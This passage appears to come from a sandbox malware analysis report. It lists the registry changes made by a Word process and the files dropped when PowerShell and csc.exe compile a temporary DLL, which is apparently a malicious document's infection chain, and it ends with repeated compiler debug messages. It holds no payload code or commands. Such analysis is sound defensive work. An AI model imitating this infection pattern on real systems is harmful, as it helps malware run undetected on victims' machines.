Value: 6A2B33001009000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2320) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | j+3 |
Value: 6A2B33001009000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2320) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR2DF3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1184 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\91U0G2ZO022UMOH09LYR.temp | — | |
MD5:— | SHA256:— | |||
1920 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WF3UQDBDSVLNK4AOM01Z.temp | — | |
MD5:— | SHA256:— | |||
1920 | powershell.exe | C:\Users\admin\AppData\Local\Temp\jfwya5zq.0.cs | — | |
MD5:— | SHA256:— | |||
1920 | powershell.exe | C:\Users\admin\AppData\Local\Temp\jfwya5zq.cmdline | — | |
MD5:— | SHA256:— | |||
1692 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC3A28.tmp | — | |
MD5:— | SHA256:— | |||
1692 | csc.exe | C:\Users\admin\AppData\Local\Temp\jfwya5zq.pdb | — | |
MD5:— | SHA256:— | |||
2160 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES3A29.tmp | — | |
MD5:— | SHA256:— | |||
1692 | csc.exe | C:\Users\admin\AppData\Local\Temp\jfwya5zq.dll | — | |
MD5:— | SHA256:— | |||
1692 | csc.exe | C:\Users\admin\AppData\Local\Temp\jfwya5zq.out | — | |
MD5:— | SHA256:— |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|